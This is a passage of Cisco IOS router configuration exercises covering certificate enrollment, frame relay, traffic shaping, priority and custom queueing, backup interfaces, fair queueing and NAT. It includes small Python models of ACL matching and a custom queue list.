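# Constructed: a subnet mask typed where a wildcard belongs. This ignores the
# first two octets and matches on the last two, the opposite of what was meant.
MASK_MISTAKE = parse_acl("access-list 100 permit tcp 215.78.24.0 255.255.0.0 97.49.56.0 255.255.0.0 eq smtp")
MASK_FIXED = parse_acl("access-list 100 permit tcp 215.78.24.0 0.0.255.255 97.49.56.0 0.0.255.255 eq smtp")

if __name__ == "__main__":
    peer, me = "117.84.81.2", "61.222.47.2"
    print("ESP from peer      :", evaluate(PAGE_ACLS[101], 50, peer, me))
    print("IKE udp/500        :", evaluate(PAGE_ACLS[101], 17, peer, me, 500, 500))
    print("NAT-T udp/4500     :", evaluate(PAGE_ACLS[101], 17, peer, me, 4500, 4500))
    print("ESP from elsewhere :", evaluate(PAGE_ACLS[101], 50, "203.0.113.9", me))
    print("mask mistake, real :", evaluate(MASK_MISTAKE[100], 6, "215.78.1.1", "97.49.2.2", 40000, 25))
    print("mask mistake, other:", evaluate(MASK_MISTAKE[100], 6, "8.8.24.0", "9.9.56.0", 40000, 25))
```

If the peer sits behind NAT, IKE switches to UDP 4500 (NAT traversal) and ESP is carried inside it, so the list as written would silently break the tunnel; an extra `permit udp host ... host ... eq non500-isakmp` entry is needed in that case.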

Cisco Router Challenge 59


Outline
This challenge involves setting up a CA identity (trustpoint) and enrolling the router with it.

Objectives
The objectives of this challenge are to:

Generate a public and private key.
Define the CA.

Example
> en
# config t
(config)# hostname london
(config)# ip domain-name test.com
london (config)# crypto key generate rsa
london (config)# crypto ca identity idaho
london (ca-identity)# ?
  Syntax: enrollment url [url]
  Syntax: enrollment mode ra
  Syntax: crl option
  Syntax: query [url]
london (ca-identity)# enrollment url http://helpcert
london (ca-identity)# crl optional
london (ca-identity)# exit
london (config)# crypto ca authenticate idaho
london (config)# crypto ca enroll idaho

Explanation
The hostname and domain name must be set first, because the RSA key pair is named after the
fully qualified hostname (london.test.com). crypto key generate rsa prompts for the modulus
size; accept nothing below 2048 bits. crypto ca authenticate downloads the CA certificate, whose
fingerprint should be verified out of band before it is accepted, and crypto ca enroll sends
the certificate request. crl optional lets the router accept a peer certificate even when the
CRL cannot be retrieved, which means a revoked certificate can still be used; set it only where
the CRL distribution point is known to be unreachable. In newer IOS releases the same commands
appear as crypto pki trustpoint, crypto pki authenticate and crypto pki enroll.

Cisco Router Challenge 36


Outline
This challenge involves the configuration of frame relay.

Objectives
The objectives of this challenge are to:

Define frame-relay encapsulation.

Example
> en
# config t
(config)# int s0
(config-if)# ip address 196.85.163.9 255.255.192.0
(config-if)# no shutdown
(config-if)# encapsulation ?
  atm-dxi      ATM-DXI encapsulation
  frame-relay  Frame Relay networks
  hdlc         Serial HDLC synchronous
  lapb         LAPB (X.25 Level 2)
  ppp          Point-to-Point protocol
  smds         Switched Megabit Data Service (SMDS)
  x25          X.25
(config-if)# encapsulation frame-relay
(config-if)# frame-relay ?
  broadcast-queue      Define a broadcast queue and transmit rate
  class                Define a map class on the interface
  de-group             Associate a DE group with a DLCI
  interface-dlci       Define a DLCI on an interface/subinterface
  intf-type            Configure a FR DTE/DCE/NNI interface
  inverse-arp          Enable/disable inverse ARP on a DLCI
  ip                   Frame Relay Internet Protocol config commands
  lapf                 set LAPF parameter
  lmi-n391dte          set full status polling counter
  lmi-n392dce          LMI error threshold
  lmi-n392dte          LMI error threshold
  lmi-n393dce          set LMI monitored event count
  lmi-n393dte          set LMI monitored event count
  lmi-t392dce          set DCE polling verification timer
  lmi-type             Use CISCO-ANSI-CCITT type LMI
  local-dlci           Set source DLCI when LMI is not supported
  map                  Map a protocol address to a DLCI address
  multicast-dlci       Set DLCI of a multicast group
  priority-dlci-group  Define a priority group of DLCIs
  qos-autosense        enable QOS autosense
  route                frame relay route for pvc switching
  svc                  Enable frame relay SVCs
  traffic-shaping      Enable Frame Relay Traffic Shaping
  traps-maximum        set max traps FR generates at link up or when getting LMI Full Status message
(config-if)# frame-relay map ?
  bridge  Bridging
  ip      IP
  ipx     Novell IPX
  llc2    llc2
(config-if)# frame-relay map ip ?
  A.B.C.D  Protocol specific address
(config-if)# frame-relay map ip 196.85.163.14 ?
  <16-1007>  DLCI
(config-if)# frame-relay map ip 196.85.163.14 102 ?
  broadcast            Broadcasts should be forwarded to this address
  cisco                Use CISCO Encapsulation
  compress             Enable TCP/IP and RTP/IP header compression
  ietf                 Use RFC1490/RFC2427 Encapsulation
  nocompress           Do not compress TCP/IP headers
  payload-compression  Use payload compression
  rtp                  RTP header compression parameters
  tcp                  TCP header compression parameters
  <cr>
(config-if)# frame-relay map ip 196.85.163.14 102 broadcast
(config-if)# frame-relay map ip 196.85.163.17 103 broadcast
(config-if)# ip ospf ?
  authentication       Enable authentication
  authentication-key   Authentication password (key)
  cost                 Interface cost
  database-filter      Filter OSPF LSA during synchronization and flooding
  dead-interval        Interval after which a neighbor is declared dead
  demand-circuit       OSPF demand circuit
  hello-interval       Time between HELLO packets
  message-digest-key   Message digest authentication password (key)
  mtu-ignore           Ignores the MTU in DBD packets
  network              Network type
  priority             Router priority
  retransmit-interval  Time between retransmitting lost link state advertisements
  transmit-delay       Link state transmit delay
(config-if)# ip ospf network ?
  broadcast            Specify OSPF broadcast multi-access network
  non-broadcast        Specify OSPF NBMA network
  point-to-multipoint  Specify OSPF point-to-multipoint network
  point-to-point       Specify OSPF point-to-point network
(config-if)# ip ospf network point-to-multipoint

Cisco Router Challenge 63


Outline
This challenge involves the configuration of frame relay.

Objectives
The objectives of this challenge are to:

Define frame relay.
Define encapsulation for frame-relay.
Define a mapping.
Define an LMI type.

Example
> en
# config t
(config)# int s0
(config-if)# ip address 62.250.1.7 255.0.0.0
(config-if)# no shut
(config-if)# encapsulation ?
  atm-dxi      ATM-DXI encapsulation
  frame-relay  Frame Relay networks
  hdlc         Serial HDLC synchronous
  lapb         LAPB (X.25 Level 2)
  ppp          Point-to-Point protocol
  smds         Switched Megabit Data Service (SMDS)
  x25          X.25
(config-if)# encapsulation frame-relay
(config-if)# frame-relay map ip 62.250.1.12 ?
  <16-1007>  DLCI
(config-if)# frame-relay map ip 62.250.1.12 102 ?
  broadcast            Broadcasts should be forwarded to this address
  cisco                Use CISCO Encapsulation
  compress             Enable TCP/IP and RTP/IP header compression
  ietf                 Use RFC1490/RFC2427 Encapsulation
  nocompress           Do not compress TCP/IP headers
  payload-compression  Use payload compression
  rtp                  RTP header compression parameters
  tcp                  TCP header compression parameters
  <cr>
(config-if)# frame-relay map ip 62.250.1.12 102 broadcast
(config-if)# frame-relay map ip 62.250.1.15 103 broadcast
(config-if)# frame-relay ?
  broadcast-queue      Define a broadcast queue and transmit rate
  class                Define a map class on the interface
  de-group             Associate a DE group with a DLCI
  interface-dlci       Define a DLCI on an interface/subinterface
  intf-type            Configure a FR DTE/DCE/NNI interface
  inverse-arp          Enable/disable inverse ARP on a DLCI
  ip                   Frame Relay Internet Protocol config commands
  lapf                 set LAPF parameter
  lmi-n391dte          set full status polling counter
  lmi-n392dce          LMI error threshold
  lmi-n392dte          LMI error threshold
  lmi-n393dce          set LMI monitored event count
  lmi-n393dte          set LMI monitored event count
  lmi-t392dce          set DCE polling verification timer
  lmi-type             Use CISCO-ANSI-CCITT type LMI
  local-dlci           Set source DLCI when LMI is not supported
  map                  Map a protocol address to a DLCI address
  multicast-dlci       Set DLCI of a multicast group
  priority-dlci-group  Define a priority group of DLCIs
  qos-autosense        enable QOS autosense
  route                frame relay route for pvc switching
  svc                  Enable frame relay SVCs
  traffic-shaping      Enable Frame Relay Traffic Shaping
  traps-maximum        set max traps FR generates at link up or when getting LMI Full Status message
(config-if)# frame-relay lmi-type ?
  cisco
  ansi
  q933a
(config-if)# frame-relay lmi-type ansi

Ref
http://www.cisco.com/univercd/cc/td/doc/product/software/ios121/121cgcr/wan_c/wcdfrely.htm

Cisco Router Challenge 64


Outline
This challenge involves the configuration of frame relay for traffic shaping.

Objectives
The objectives of this challenge are to:

Define a map class.
Define traffic rates.
Define adaptive shaping.
Define a priority-group.
Apply map class to an interface.

Example
> en
# config t
(config)# map-class frame-relay kirkcaldy
(config-map-class)# frame-relay traffic-rate ?
  <600-45000000>  Committed Information Rate (CIR)
(config-map-class)# frame-relay traffic-rate 9600 ?
  <0-45000000>  Peak rate (CIR + EIR)
  <cr>
(config-map-class)# frame-relay traffic-rate 9600 18000
(config-map-class)# frame-relay adaptive-shaping ?
  becn       Enable rate adjustment in response to BECN
  foresight  Enable rate adjustment in response to ForeSight messages and BECN
(config-map-class)# frame-relay adaptive-shaping becn
(config-map-class)# frame-relay priority-group 3
(config-map-class)# exit
(config)# int s0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# encapsulation frame-relay
(config-if)# frame-relay traffic-shaping
(config-if)# frame-relay class kirkcaldy

Explanation
Traffic shaping controls the traffic going out of an interface, and should match the flow of
traffic to the rate at which the remote device (or the carrier's CIR) can accept the data. The
commands used include:
frame-relay adaptive-shaping [becn | foresight]
  Select either BECN or ForeSight as the backward congestion-notification mechanism to
  which traffic shaping will adapt (the rate is throttled towards the CIR when congestion
  is signalled).
frame-relay traffic-shaping
  Enable Frame Relay traffic shaping and per-VC queueing on the interface.
frame-relay traffic-rate average [peak]
  Define the average (CIR) and optional peak rate, in bps, for the map class.
frame-relay priority-group list-number
  Specify a priority queue list to be used for the VCs in the map class.
map-class frame-relay map-class-name
  Specify a map class to define.

Ref:
http://www.cisco.com/univercd/cc/td/doc/product/software/ios120/12cgcr/qos_c/qcpart4/qcfrts.htm

Cisco Router Challenge 65


Outline
This challenge involves the configuration of Frame Relay traffic shaping with priority queueing.

Objectives
The objectives of this challenge are to:

Define a map class.
Define traffic rates.
Define adaptive shaping.
Define a priority-group.
Apply map class to an interface.

Example
# config t
(config)# map-class frame-relay ion
(config-map-class)# frame-relay priority-group 37
(config-map-class)# exit
(config)# priority-list 37 protocol ip normal
(config)# priority-list 37 default ?
  high
  medium
  normal
  low
(config)# priority-list 37 default medium
(config)# int s0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# encapsulation frame-relay
(config-if)# frame-relay traffic-shaping
(config-if)# frame-relay class ion

Explanation
With priority queueing the traffic is classified using a priority-list, and the priority-group
command within the map-class defines which priority-list to use. There are four queues: high,
medium, normal and low. The router always serves the high queue first and only transmits from
a lower queue when every higher queue is empty, so high-priority traffic always gets through
while the lower queues can be starved and, once full, tail-drop their packets.
To classify traffic the following syntax is used:
priority-list list-number protocol protocol-name {high | medium | normal |
low} queue-keyword keyword-value

where

protocol-name classifies the traffic. It is typically ip, but can be ipx, appletalk, and so on.
list-number identifies the list; all statements with the same number form one policy, and the
number can range from 1 to 16.
queue-keyword can be one of: fragments, gt, lt, list, tcp, and udp.
keyword-value is the argument for the keyword: the port for tcp or udp, the packet size for gt
or lt, or the access-list number for list.

The default queue for all other traffic can then be specified with:
priority-list list-number default {high | medium | normal | low}

Ref
http://www.cisco.com/en/US/products/sw/iosswrel/ps1835/products_configuration_guide_chapter09186a00800b75b0.html

Cisco Router Challenge 66


Outline
This challenge involves the configuration of Frame Relay traffic shaping with custom queueing (a queue-list).

Objectives
The objectives of this challenge are to:

Define an access-list to define the traffic for queuing.
Define a map class.
Define a queue list.

Example
> en
# config t
(config)# access-list 100 permit tcp 215.78.24.0 0.0.255.255 97.49.56.0 0.0.255.255 eq smtp
(config)# map-class frame-relay ion
(config-map-class)# frame-relay custom-queue-list 13
(config-map-class)# exit
(config)# queue-list ?
  <1-16>  Queue list number
(config)# queue-list 13 ?
  default        Set custom queue for unspecified datagrams
  interface      Establish priorities for packets from a named interface
  lowest-custom  Set lowest number of queue to be treated as custom
  protocol       priority queueing by protocol
  queue          Configure parameters for a particular queue
  stun           Establish priorities for stun packets
(config)# queue-list 13 protocol ?
  arp            IP ARP
  bridge         Bridging
  cdp            Cisco Discovery Protocol
  compressedtcp  Compressed TCP
  ip             IP
  ipx            Novell IPX
  llc2           llc2
  pad            PAD links
  snapshot       Snapshot routing support
(config)# queue-list 13 protocol ip ?
  <0-16>  queue number
(config)# queue-list 13 protocol ip 1 ?
  fragments  Prioritize fragmented IP packets
  gt         Classify packets greater than a specified size
  list       To specify an access list
  lt         Classify packets less than a specified size
  tcp        Prioritize TCP packets 'to' or 'from' the specified port
  udp        Prioritize UDP packets 'to' or 'from' the specified port
  <cr>
(config)# queue-list 13 protocol ip 1 list ?
  <1-199>      IP access list
  <1300-2699>  IP expanded access list
(config)# queue-list 13 protocol ip 1 list 100
(config)# queue-list 13 queue 1 byte-count 1000 limit 2
(config)# queue-list 13 queue 2 byte-count 700 limit 20
(config)# queue-list 13 default 2
(config)# int s0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# encapsulation frame-relay
(config-if)# frame-relay traffic-shaping


(config-if)# frame-relay class kirkcaldy

Explanation
This example uses two queues, which are identified by an ACL (in this case they are the
same, but normally they would have different ACLs). For example, the first queue is
matched to the ACL numbered 100:
queue-list 13 protocol ip 1 list 100

The following command defines that queue 1 may send 1000 bytes per cycle of the queue
list and that there is a maximum of two packets in the queue:
queue-list 13 queue 1 byte-count 1000 limit 2
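As an added example (not part of the NetworkSims text or Cisco's implementation), this Python model of the queue list above shows the effect of byte-count and limit: queue 1 (SMTP matched by ACL 100) gets the larger byte-count but a limit of two packets, so a burst of SMTP is tail-dropped while the default queue 2 holds all of its traffic. The packet sizes are constructed.

```python
from collections import deque
from dataclasses import dataclass, field
from typing import Callable, Deque, Dict, List, Tuple

# Model of an IOS custom queue list (queue-list 13 ... from the challenge above).
# Added example, not NetworkSims or Cisco code; the packet burst below is constructed.


@dataclass
class CustomQueue:
    """One queue: 'queue-list N queue Q byte-count B limit L'."""
    byte_count: int                     # bytes the queue may send per round-robin cycle
    limit: int                          # maximum packets held; further arrivals are tail-dropped
    packets: Deque[int] = field(default_factory=deque)
    dropped: int = 0

    def enqueue(self, size: int) -> bool:
        if len(self.packets) >= self.limit:
            self.dropped += 1           # 'limit' is a packet cap, not a bandwidth guarantee
            return False
        self.packets.append(size)
        return True


def classify(packet: dict, rules: List[Tuple[int, Callable[[dict], bool]]],
             default_queue: int) -> int:
    """First matching 'queue-list N protocol ip Q list ACL' rule wins, else the default queue."""
    for qnum, matches in rules:
        if matches(packet):
            return qnum
    return default_queue


def schedule(queues: Dict[int, CustomQueue], cycles: int) -> Dict[int, int]:
    """Round-robin over the queues. In each cycle a queue sends whole packets until at
    least byte_count bytes have gone (the packet that crosses the threshold is finished).
    Returns the bytes sent per queue."""
    sent = {q: 0 for q in queues}
    for _ in range(cycles):
        for qnum in sorted(queues):
            cq = queues[qnum]
            sent_this_turn = 0
            while cq.packets and sent_this_turn < cq.byte_count:
                size = cq.packets.popleft()
                sent_this_turn += size
                sent[qnum] += size
    return sent


def acl_100(p: dict) -> bool:
    """access-list 100 permit tcp ... eq smtp (only the protocol/port test is modelled)."""
    return p["proto"] == "tcp" and p["dport"] == 25


# Constructed burst: five SMTP segments of 600 bytes, then six HTTP segments of 400 bytes.
SAMPLE_PACKETS = (
    [{"proto": "tcp", "dport": 25, "size": 600} for _ in range(5)]
    + [{"proto": "tcp", "dport": 80, "size": 400} for _ in range(6)]
)


def simulate_challenge_66(packets: List[dict], cycles: int = 3) -> dict:
    """queue 1 byte-count 1000 limit 2; queue 2 byte-count 700 limit 20; default 2."""
    queues = {1: CustomQueue(byte_count=1000, limit=2),
              2: CustomQueue(byte_count=700, limit=20)}
    rules = [(1, acl_100)]
    for p in packets:                   # the whole burst arrives before the scheduler runs
        queues[classify(p, rules, default_queue=2)].enqueue(p["size"])
    sent = schedule(queues, cycles)
    return {"sent": sent,
            "dropped": {q: cq.dropped for q, cq in queues.items()},
            "left": {q: len(cq.packets) for q, cq in queues.items()}}


if __name__ == "__main__":
    print(simulate_challenge_66(SAMPLE_PACKETS))
    # {'sent': {1: 1200, 2: 2400}, 'dropped': {1: 3, 2: 0}, 'left': {1: 0, 2: 0}}
```

Per cycle queue 1 may move 1000 bytes against 700 for queue 2, but because only two SMTP packets fit under limit 2, three of the five are dropped on arrival.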

Ref:
http://www.cisco.com/en/US/products/hw/switches/ps1893/products_command_reference_chapter09186a008007dec9.html

Cisco Router Challenge 67


Outline
This challenge involves the configuration of backup routes.
Objectives
The objectives of this challenge are to:

Define a backup interface.
Define the backup timings.

Example
> en
# config t
(config)# int s0
(config-if)# ip address 139.202.25.3 255.255.255.240
(config-if)# no shut
(config-if)# backup ?
  delay      Delays before backup line up or down transitions
  interface  Configure an interface as a backup
  load       Load thresholds for line up or down transitions
(config-if)# backup interface ?
  Async              Async interface
  BRI                ISDN Basic Rate Interface
  BVI                Bridge-Group Virtual Interface
  Dialer             Dialer interface
  FastEthernet       FastEthernet IEEE 802.3
  Group-Async        Async Group interface
  Lex                Lex interface
  Loopback           Loopback interface
  Multilink          Multilink-group interface
  Null               Null interface
  Serial             Serial
  Tunnel             Tunnel interface
  Virtual-Template   Virtual Template interface
  Virtual-TokenRing  Virtual TokenRing
  Vlan               Catalyst Vlans
(config-if)# backup interface bri0
(config-if)# backup delay ?
  <0-4294967294>  Seconds
  never           Never activate the backup line
(config-if)# backup delay 52 ?
  <0-4294967294>  Seconds
  never           Never deactivate the backup line
(config-if)# backup delay 52 83
(config-if)# backup load 86 68

Remember to check that the BRI0 interface is now a backup, such as:
# sh interface bri0
BRI0 is standby mode, line protocol is down
Hardware is PQUICC BRI with U interface
MTU 1500 bytes, BW 64 Kbit, DLY 20000 usec,
reliability 255/255, txload 1/255, rxload 1/255
Encapsulation HDLC, loopback not set
Last input never, output never, output hang never
Last clearing of "show interface" counters never
Input queue: 0/75/0/0 (size/max/drops/flushes); Total output drops: 0
Queueing strategy: weighted fair
Output queue: 0/1000/64/0 (size/max total/threshold/drops)
Conversations 0/0/16 (active/max active/max total)
Reserved Conversations 0/0 (allocated/max allocated)
5 minute input rate 0 bits/sec, 0 packets/sec
5 minute output rate 0 bits/sec, 0 packets/sec
0 packets input, 0 bytes, 0 no buffer
Received 0 broadcasts, 0 runts, 0 giants, 0 throttles
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
0 packets output, 0 bytes, 0 underruns
0 output errors, 0 collisions, 0 interface resets
0 output buffer failures, 0 output buffers swapped out
0 carrier transitions

Explanation
A backup route is important to provide resilience. The following defines that the BRI0
interface will be the backup route:
backup interface bri0

Then to activate the backup after the primary line has been inactive for 52 seconds, and to
deactivate the backup 83 seconds after the primary line has been re-activated, the following
command is used:
backup delay 52 83

When loading is used, the following defines that the backup route becomes active when the
primary reaches 86% of its full load, and deactivates at 68% of full load:
backup load 86 68

Ref:
http://www.cisco.com/en/US/products/sw/iosswrel/ps1828/products_command_reference_chapter09186a00800ca527.html

Cisco Router Challenge 68


Outline
This challenge involves the configuration of Weighted Fair Queues.
Objectives
The objectives of this challenge are to:

Define a frame-relay encapsulation.
Define the congestion discard threshold.
Define the bandwidth on the interface.

Example
> en
# config t
(config)# int s0
(config-if)# encapsulation frame-relay
(config-if)# fair-queue 128
(config-if)# bandwidth 100
(config-if)# exit


(config)# exit

Remember to check that queueing is applied:


# sh int s0
Serial0 is down, line protocol is down
Hardware is PowerQUICC Serial
Internet address is /0
MTU 1500 bytes, BW 100 Kbit, DLY 20000 usec,
reliability 128/255, txload 1/255, rxload 1/255
Encapsulation frame-relay, loopback not set
Keepalive set (10 sec)
Last input 03:56:59, output 00:00:06, output hang never
Last clearing of "show interface" counters 6d07h
Input queue: 0/75/0/0 (size/max/drops/flushes); Total output drops: 0
Queueing strategy: weighted fair
Output queue: 0/1000/64/0 (size/max total/threshold/drops)
Conversations 0/2/256 (active/max active/max total)
Reserved Conversations 0/0 (allocated/max allocated)
5 minute input rate 0 bits/sec, 0 packets/sec
5 minute output rate 0 bits/sec, 0 packets/sec
63247 packets input, 3952974 bytes, 0 no buffer
Received 61877 broadcasts, 0 runts, 535 giants, 0 throttles
2571 input errors, 138 CRC, 1456 frame, 0 overrun, 0 ignored, 743 abort
64668 packets output, 4136835 bytes, 0 underruns
0 output errors, 0 collisions, 474 interface resets
0 output buffer failures, 0 output buffers swapped out
952 carrier transitions
DCD=up DSR=up DTR=up RTS=up CTS=up

Ref:
http://www.opalsoft.net/qos/WhyQos-2424.htm

Cisco Router Challenge 69


Outline
This challenge involves the configuration of CBWFQ.
Objectives
The objectives of this challenge are to:

Define CBWFQ.

Example


> en
# config t
(config)# access-list 108 permit ip 162.78.102.0 0.0.255.255 247.226.90.0 0.0.255.255
(config)# class-map tayside
(config-cmap)# match access-group 108
(config-cmap)# exit
(config)# policy-map ankle
(config-pmap)# class tayside
(config-pmap-c)# bandwidth 128
(config-pmap-c)# queue-limit 21
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int s0
(config-if)# service-policy output ankle

Explanation
The following shows an example of limiting all the traffic which fits access-list 111 to
2Mbps. The three steps are: class map (identify the traffic characteristic), policy map
(define the policy for the traffic) and service policy (apply the policy to an interface):

(config)# class-map cmap
(config-cmap)# match access-group 111
(config)# policy-map pmap
(config-pmap)# class cmap
(config-pmap-c)# bandwidth 2000
(config)# int s0
(config-if)# service-policy output pmap

Limit traffic which fits access-list 111 to 2Mbps

Ref:
http://www.netcraftsmen.net/welcher/papers/newqos121.html


Cisco Router Challenge 70


Outline
This challenge involves the configuration of dynamic NAT.
Objectives
The objectives of this challenge are to:

Define a dynamic NAT pool.
Define an access-list to identify the traffic to be translated.
Apply NAT on E0 and S0 interfaces.

Example
> en
# config t
(config)# access-list 7 permit 195.11.220.0 31.255.255.255
(config)# ip nat pool mynatpool 150.122.41.99 150.122.41.150 netmask 255.255.255.0
(config)# ip nat inside source list 7 pool mynatpool
(config)# int e0
(config-if)# ip nat inside
(config-if)# int s0
(config-if)# ip nat outside

Cisco Router Challenge 71


Outline
This challenge involves the configuration of dynamic NAT.
Objectives
The objectives of this challenge are to:

Define three static NAT mappings.
Apply NAT on E0 and S0 interfaces.

Example


> en
# config t
(config)# ip nat inside source static 160.94.210.50 93.123.33.13
(config)# ip nat inside source static 160.94.210.53 93.123.33.15
(config)# ip nat inside source static 160.94.210.55 93.123.33.18
(config)# int e0
(config-if)# ip nat inside
(config-if)# int s0
(config-if)# ip nat outside

Explanation
In this case the lines:
(config)# ip nat inside source static 160.94.210.50 93.123.33.13
(config)# ip nat inside source static 160.94.210.53 93.123.33.15
(config)# ip nat inside source static 160.94.210.55 93.123.33.18

defines that a host with the address of 160.94.210.50 will be viewed from the outside of the
network as 93.123.33.13. Thus, for example, if the host at 160.94.210.50 is a Web server, users
from outside the network will access it using the address of 93.123.33.13. Normally servers
which have public access have a static mapping, as this allows them to be reached at a fixed
address from outside.
Theory
Network address translation (NAT) is defined in RFC1631, and swaps one network address
with another. This allows private networks (RFC1918) to be created, which are then
translated to public address when they access the Internet. A router can operate at the
border of a domain and translate addresses from private to public, and vice-versa. For
example, a node could be given a private address of 192.168.10.12. The NAT could then
translate this to a public address of 168.10.34.31. The NAT table would then have the
mapping of:
Private        Public
192.168.10.12  168.10.34.21

If a host from outside the domain sends a data packet back to the domain, the NAT will
translate the public address back into the private address. These translations can be
statically assigned, such as where it is setup with a permanent mapping, or dynamically,
where the tables can change as the network requires. Figure 1 gives an example, where the
destination address is 11.22.33.44. The address in this case is changed from 192.168.10.12 to
168.10.34.21, as the data packet goes out of the domain, and is changed back when it comes
back into the domain.


PAT (Port address translation)
NAT routers can use port address translation (PAT), which allows many internal addresses to
be mapped to the same global address. This is also known as many-to-one NAT, or address
overloading. With PAT, the NAT router keeps track of the connections, and the TCP/UDP
ports that are being used. The NAT router then changes the global address back into a
private address based on these. In Figure 2 there is a single external address (168.10.34.21),
but multiple source ports are used to identify the connection. It can be seen in the example
in Figure 3 that a host has four different connections with a WWW server, and each of the
connections has been mapped to a unique source port (5555, 5556, 5557 and 5558).
Figure 1: Example of NAT. Outgoing data leaves the host as IP Src 192.168.10.12, IP Dest
11.22.33.44 and is sent by the NAT router as IP Src 168.10.34.21, IP Dest 11.22.33.44.
Incoming data arrives as IP Src 11.22.33.44, IP Dest 168.10.34.21 and is delivered as IP Src
11.22.33.44, IP Dest 192.168.10.12.

In summary the advantages of NAT are:

Hides the network addresses of the network.
Bars direct contact with a host.
Increased range of addresses.
Allows easy creation of subnetworks.

Figure 2: Example of port address translation (PAT). Outgoing data leaves the host as Src
192.168.10.12:4444, Dest 11.22.33.44:80 and is sent by the NAT router as Src
168.10.34.21:5555, Dest 11.22.33.44:80. Incoming data arrives as Src 11.22.33.44:80, Dest
168.10.34.21:5555 and is delivered as Src 11.22.33.44:80, Dest 192.168.10.12:4444. PAT
maps many addresses to one global address.


Figure 3: Example of port address translation (PAT), showing new connections in the table.
The packet flow is as in Figure 2; the resulting table entries are:

IP:port (inside)    IP:port (outside)   IPdest:port
192.168.10.12:4444  168.10.34.21:5555   11.122.33.44:80
192.168.10.12:4445  168.10.34.21:5556   11.122.33.44:80
192.168.10.12:4446  168.10.34.21:5557   11.122.33.44:80
192.168.10.20:1234  168.10.34.21:5558   11.122.33.44:80

NAT types
The three main types of NAT are:

Static translation. Each public IP address translates to a private one through a static
table. It is good for security/logging/traceability, but does not hide the internal network.
As the network addresses are statically defined, the nodes inside the network can be
contacted directly from outside. Static translation also does not save on network addresses,
although an organisation may limit access by limiting the number of private addresses
which are available.
(Figure: private addresses a1.b1.c1.d1 and a2.b2.c2.d2 map one-to-one to public addresses
w1.x1.y1.z1 and w2.x2.y2.z2.)

IP Masquerading (Dynamic Translation). A single public IP address is used for the whole
network. The table is thus dynamic, and uses TCP ports to identify connections. It has the
advantage that a complete network requires only a single public address, but, of course, the
network which is allocated with private addresses is dependent upon the NAT device for its
connection to external networks.
(Figure: private addresses a1.b1.c1.d1 and a2.b2.c2.d2 map to the single public address
w.x.y.z.)

Load Balancing Translation. With this, a request is made to a resource, such as a WWW
server; the NAT device then looks at the current loading of the systems, and forwards the
request to the one which is most lightly used (Figure 4).

Figure 4: Load balancing translation. The NAT device selects the least used resource: the
public address w.x.y.z maps to one of the servers in the pool, a1.b1.c1.d1 or ... or
an.bn.cn.dn.

NAT backtracking
Dynamic NAT is good at isolating the internal network from a public untrusted network, as
it allows the NAT device to create a table of connections which have been initiated from
inside. Thus external devices cannot contact hosts, as those hosts have no mapping in the
NAT device. Unfortunately some applications, such as FTP and IRC, require a server
connection to be set up on the host. Thus the NAT device must be able to implement
backtracking of connections, as illustrated in Figure 5.

Figure 5: NAT backtracking. Left: private addresses a1.b1.c1.d1 and a2.b2.c2.d2 behind
public addresses w1.x1.y1.z1 and w2.x2.y2.z2; NAT is good as we are isolated from the
external public network, where our hosts initiate the connections. Right: private addresses
a1.b1.c1.d1 and a2.b2.c2.d2 behind the single public address w.x.y.z; but what happens if we
use applications which create connections in the reverse direction, such as with FTP and
IRC? We thus need some form of backtracking of connections in the NAT device.

NAT weaknesses
Static NAT is poor for security, as it does not hide the network. This is because there is a
one-to-one mapping, and external nodes can thus connect to internal devices. It also does
not hide the host from the external network, so that it can be traced, if the mapping table is
known. Dynamic NAT is much better for security, as it hides the network. Unfortunately it
has two major weaknesses:
- Backtracking allows external parties to trace back a connection.
- If the NAT device becomes compromised the external party can redirect traffic.
These weaknesses are illustrated in Figure 5.
Figure 5: NAT weaknesses. Static NAT is poor for security, as it does not hide the network
(one-to-one mapping of a1.b1.c1.d1 to w1.x1.y1.z1). Dynamic NAT is good for security, as it
hides the network, but has two major weaknesses: backtracking allows external parties to
trace back a connection, and a compromised NAT table causes a connection intended for the
corporate WWW site to point to the external intruder's WWW site.

Programming dynamic NAT
Network address translation allows private IP addresses to be translated to public addresses.
This can either be achieved statically, where the translation is fixed by a translation table, or
can be dynamic, where the translation table is set up as required by the network. Typically,
a global address pool is used from which the public addresses are taken. The command for
this has the format of:
RouterA# config t
RouterA(config)#ip nat pool name start-ip end-ip {netmask netmask | prefix-length prefix-length}

where the subnet mask is defined either by the netmask argument (such as
255.255.255.0), or by a length using prefix-length (such as 24 for the 255.255.255.0 subnet mask).
After this, the types of packets which will be translated are defined. This is achieved
with the access-list command, and has the form:
RouterA# config t
RouterA(config)#access-list access-list-number permit source [source-wildcard]

A dynamic translation uses the ip nat inside source list command, such as:

Router(config)#ip nat inside source list access-list-number pool name

where the access list number is defined. This is then applied to one of the interfaces using
the command (for s0):
RouterA# config t
RouterA(config)# int s0
RouterA(config-if)#ip nat inside

This will translate data packets which come in on that interface from the inside. To translate
outgoing ones, the ip nat outside command is used on the outside interface.
For example, to define a pool of addresses from 180.10.11.1 to 180.10.11.254:
RouterA(config)#ip nat pool org_pool 180.10.11.1 180.10.11.254 netmask 255.255.255.0

which defines the global addresses as org_pool. This will be used to send translated data
packets out onto the Internet. An access-list command is then used to match the translation
addresses:
RouterA(config)#access-list 2 permit 192.168.10.0 0.0.0.255
RouterA(config)#ip nat inside source list 2 pool org_pool

which applies the access-list number 2 to the IP NAT pool org_pool. This can then be
applied to the interfaces with:

RouterA(config)#interface e0
RouterA(config-if)#ip nat inside
RouterA(config-if)#interface s0
RouterA(config-if)#ip nat outside

Thus if a host with an address of 192.168.10.10 sends a data packet out of the network, it will
have one of the addresses from the pool, such as 180.10.11.1. All the hosts outside the
network will use the address from the pool to communicate with the node. By default, these
entries remain in the table for up to 24 hours (in order to allow communications to return).
The time-out can be changed using the command:
RouterA(config)#ip nat translation timeout seconds

This is an important factor, especially when there is a large number of hosts which can only
use a limited pool of addresses. A lower time-out will allow an address to be released, so
that another node can use it.
NAT also enhances security as it limits external users in their connections to the local
network, as the translations of addresses will not be permanent (unless a static translation is
implemented). NAT thus hides the topology of the network.
Static translation uses a fixed lookup table to translate the addresses, where each
address which requires an Internet address has a corresponding public IP address. If it is
used on its own, it thus cannot conserve IP addresses. Thus, typically the two methods are
